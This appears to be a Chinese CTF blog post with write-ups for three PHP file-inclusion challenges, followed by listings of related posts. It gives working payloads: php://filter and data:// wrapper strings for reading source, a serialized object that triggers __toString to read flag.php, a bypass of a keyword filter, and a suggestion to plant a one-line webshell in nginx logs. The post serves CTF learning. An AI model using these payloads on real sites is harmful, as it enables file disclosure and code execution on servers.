CTF-include

已于 2022-08-16 18:55:38 修改
阅读量2k 收藏 4
点赞数 1
文章标签: web安全 学习
于 2022-08-16 18:55:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61774705/article/details/126323696
版权

目录

1、ctf.show_web4

2、[ZJCTF 2019]NiZhuanSiWei

3、[BSidesCF 2020]Had a bad day

1、ctf.show_web4

伪协议被禁了用不了 ,可以上传一句话在日志里面,然后连接。

nginx的日志文件在/var/log/nginx/access.log或/var/log/nginx/error.log

2、[ZJCTF 2019]NiZhuanSiWei

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

用data伪协议绕过文件读取:file_get_contents($text,'r')==="welcome to the zjctf")

text=data://text/plain,welcome to the zjctf

然后用php://filter伪协议 让useless.php的内容显示出来:

file=php://filter/read=convert.base64-encode/resource=useless.php

 源码如下:

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

__toString  当一个对象被当作一个字符串被调用,构造file="flag.php"就行了:

text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

源码中有这样代码:

$password = unserialize($password);
echo $password;

 password经过反序列化后是一个对象,用echo打印出来就是把它当做字符串,所以执行__toString()。

3、[BSidesCF 2020]Had a bad day

index.php?category=php://filter/read=convert.base64-encode/resource=index.php

出现报错:


Warning: include(php://filter/read=convert.base64-encode/resource=index.php.php): failed to open stream: operation failed in /var/www/html/index.php on line 37

很明显多加了个.php,把.php去了:

index.php?category=php://filter/read=convert.base64-encode/resource=index

出现源码:

 <?php
$file = $_GET['category'];

if(isset($file))
	{
	if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
	include ($file . '.php');
					}
else{
	echo "Sorry, we currently only support woofers and meowers.";
			}
}
?>

直接包含是不行的: 

category=php://filter/read=convert.base64-encode/resource=flag

要woofers,meowers,index在里面而且不是第一个字符才会包含:

category=php://filter/read=convert.base64-encode/index/resource=flag

T1M@
关注
CTF学习笔记——Include&Ping Ping Ping
Obs_cure的博客
09-20 1622
一、[ACTF2020 新生赛]Include 1.题目 2.解题步骤 点进去看了一下 根据题目猜测,应该是和php的文件包含漏洞有关…尝试了一下显示phpinfo,意料之中的失败了,看wp才了解到,这是一道伪协议的题目。然后翻了一下之前的博客,复制一下payload,成功解题。 ?file=php://filter/convert.base64-encode/resource=flag.php 3.总结 第二次做伪协议的题,只能说经验不足,辨识出来,下次遇见类似这种访问文件的题目时可以尝试。
ctf-web
weixin_43150428的博客
11-04 2839
ctf-web 信息搜集 认证绕过 SQL注入 文件上传 文件包含 PHP代码审计 信息搜集 源码泄露 页面源代码 敏感文件泄漏 备份文件(.swp/.bak/.beifen/~/phps等) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MGonEuLW-1604453612546)(https://i.loli.net/2020/11/02/kUboAxLhtRvD85z.png)] 数据库(mdb) 压缩包(zip/tar.gz//DS_Stor
Ctfer训练计划】——命令执行的解题技巧(持续更新中)
Demo不是emo的博客
12-31 6061
ctf命令执行题型解题方法汇总(持续更新中)
ctf include(文件包含漏洞)
weixin_64311421的博客
03-01 1319
不能不知道ctf比赛中的文件包含漏洞的题
ctf文件包含
qq_52671379的博客
06-14 664
ctf文件包含 题目 鼓捣一下发现一个链接shell 意思是可通过ctfhub传值 看一下代码发现看到eval函数,将请求的参数作为命令执行。可是txt文件是无法利用的,所以想到刚才的index页面中,有一个include函数通过get提交,会将shell.txt的内容合并到index.php中,尝试post提交ctfhub的值,发现被执行了,然后输出了当下目录的文件。 Flag在文件file通过get传值会被include函数将文件的内容合并到index.php中 首先将文件给到shell.tet
[CTF][ACTF2020新生赛]include
凉水的博客
10-18 2875
解题思路 1 尝试 随便试了下几种目录穿越的方法,没有错误回显,没法判断是否成功。 …/…/ 以及file=xx.php等 2 换思路 简单试过后,发觉即使是目录攻击,这种无有效提示的攻击尝试方法,也是非常低效的。应该换个其它思路试一下。 翻出ctfer成长之路,这本书,看到php的漏洞利用,有filter以及zip协议等,灵机一动,考虑到php内容本身没有回显,会不会在php代码注释里,不管,先用filter试一下base64编码,试了一下,得到: ?file=php://filter/convert.b
CTF——Web——文件包含漏洞
热门推荐
小锤队长的博客
08-19 1万+
转载于 信安之路 :https://cloud.tencent.com/developer/article/1180857 文件包含原理: 原理 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当...
CTF-Challenges
06-29
2. **函数**:PHP提供了大量的内置函数,如`echo`用于输出内容,`include`或`require`用于引入其他文件,`isset()`检查变量是否已设置并非NULL等。 3. **数据类型**:PHP支持多种数据类型,如整型、浮点型、字符串...
PWN学习,对CTF-wiki上的讲解进行一些补充
qq_33948522的博客
06-27 5754
`基本知识 ROP Return Oriented Programming,其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 一般的栈结构: 高地址 +-----------------+ ...
CTF---Web---文件包含---05---base64+路径
qq_22160557的博客
07-28 1111
文章目录前言一、题目描述二、解题步骤1、御剑扫描2、查看源码3、判断后缀4、路径构造5、base64解码三、总结 前言 题目分类: CTFWeb—文件包含—05—base64+路径 一、题目描述 题目: 172.16.15.186/stage/8/ 文件包含 二、解题步骤 1、御剑扫描 Step1:御剑扫描,得到robots.txt文件,既而得到ge_t_key.php 2、查看源码 直接去访问172.16.15.186/stage/8/ge_t_key.php,发现内容为空,因为源码中没有echo
CTF 实战选择题
02-28
CTF 实战 选择题,带答案 编辑版
bilibili2021CTF-安全挑战赛-reverse-复现
ookami6497的博客
10-27 1253
哔哩哔哩安全挑战赛逆向复现第一题第二题 第一题 第一题逆向很简单,用JEB打开,点开com包,找到主函数按tab查看伪代码,加密代码很简单,一个简单的异或就行。 将v2和v1 转成字符得到两串base64加密后的密文 v2 = NjI1OzA3YGAuNjNmNzc7YmU= v1 = YWBlOmZnNjAuOmJmNzAxO2Y= base64解码后得到 v2 = 625;07``.63f77;be v1 = a`e:fg60.:bf701;f 然后搞个脚本就行,脚本如下:
“百度杯”CTF比赛 2017 二月场---------------include
大方子
09-04 1376
================================ 个人收获: 1.网页的输出不一定会出现在页面上,也可能在页面源码里面 2.当php开启allow_url_include的时候,可以用php://input伪协议包含文件 3. php://filter/read=convert.base64-encode/resource=[文件路径] 函数读取文件内容 4.php...
CTF笔记
Bnessy
03-20 622
信息收集 源代码 响应包 robots协议 phps文件泄露 www.zip代码泄露 git代码泄露 svn泄露 vim缓存,第一次 .swp,第二次 .swo,第三次 .swn cookie dns TXT记录 环境默认账号密码 PHP探针 mdb文件( /db/db.mdb ) 数据库备份( backup.sql ) 爆破 弱口令 子域名 目录/文件 命令执行 关键字绕过 通配符 ? 如:fla??? 如:fla* 单双引号 ‘’ 如:fla’'g.php “” 如.
攻防世界ctf题目fileinclude笔记
qq_56426046的博客
08-30 2891
include处存在文件包含漏洞,变量从网站传过来的cookie确定,只要修改language参数访问flag目录即可,打开bp抓包。flag后边没有.php因为PHP代码后面拼接了php。flag在flag.php中,右键查看源代码。重放获得base64加密后的flag。根据提示,网站首页目录。...
CTF之关于include的漏洞
最新发布
Hasur的博客
03-06 1123
在介绍漏洞之前,我们需要去了解一些基本的知识点。
ctf】文件包含漏洞(一)
wlllllianqing的博客
10-06 2308
文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞 相关函数: include() include_once() require() require_once() (未完持续…) ...
ctf
handuoduo123的博客
11-02 764
ctf 啾咪 打开是一可爱的小猫咪 图片后缀为png,推测与LSB相关,用Stegsolve打开,按左右键调三原色。 ![一般情况下,将三原色都调成0,BGR排序往上拉,可以看到一段码] 将得到的码,在base64下解码 ...
buuctf include
weixin_45711265的博客
01-13 295
Buuctf 的题: include 首先考虑 "php://input"伪协议 + POST发送PHP代码 的经典套路,发现题目过滤了php://input伪协议。 再考虑用php://filter"伪协议:当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。 构造Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php 这里需要注意的是
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

T1M@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值